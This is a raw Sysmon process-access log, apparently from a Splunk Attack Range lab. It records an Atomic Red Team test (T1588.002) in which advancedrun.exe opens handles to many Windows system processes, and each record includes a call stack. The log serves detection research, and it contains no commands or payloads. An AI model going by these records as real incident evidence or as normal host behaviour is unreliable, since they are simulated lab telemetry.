17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983076Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983075Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983074Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983073Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983072Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983071Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983070Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983069Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983067Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983066Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983065Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983064Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983063Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.678{834264DD-F464-61EA-7C04-000000002702}3088892C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:00.663{834264DD-F464-61EA-7D04-000000002702}45841288C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983061Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 